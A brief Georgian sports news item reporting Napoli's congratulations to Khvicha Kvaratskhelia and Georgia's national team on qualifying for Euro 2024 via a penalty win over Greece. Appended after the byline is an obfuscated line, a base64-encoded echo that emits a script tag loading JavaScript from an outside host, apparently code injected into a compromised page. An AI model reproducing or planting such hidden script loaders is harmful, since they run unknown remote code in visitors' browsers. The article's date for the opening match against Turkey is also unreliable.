celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნულ ნაკრებს „ნაპოლი“ გამარჯვებას ულოცავს.

„ვულოცავთ ხვიჩას და საქართველოს ეროვნულ ნაკრების ევრო 2024-ზე პირველ ისტორიულ მოხვედრას“, – წერს „ნაპოლი“ სოციალურ ქსელში.

ისტორიაში პირველად, საქართველოს ეროვნული საფეხბურთო ნაკრები ევროპის ჩემპიონატზე ითამაშებს.

საქართველოს ნაკრებმა ევრო 2024-ის საკვალიფიკაციო ეტაპის ფინალურ შეხვედრაში საბერძნეთის ეროვნულ ნაკრებს სძლია. ანგარიშის ბედი პენალტების სერიაში გადაწყდა და საქართველოს სასარგებლოდ - 4:2 დასრულდა.

საქართველოს ნაკრები ევროპის ჩემპიონატზე პირველ თამაშს დორტმუნდში, თურქეთის ნაკრების წინააღმდეგ, 18 ივლისს ჩაატარებს.

ავტორი
სანდრო ჭითანავა
133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");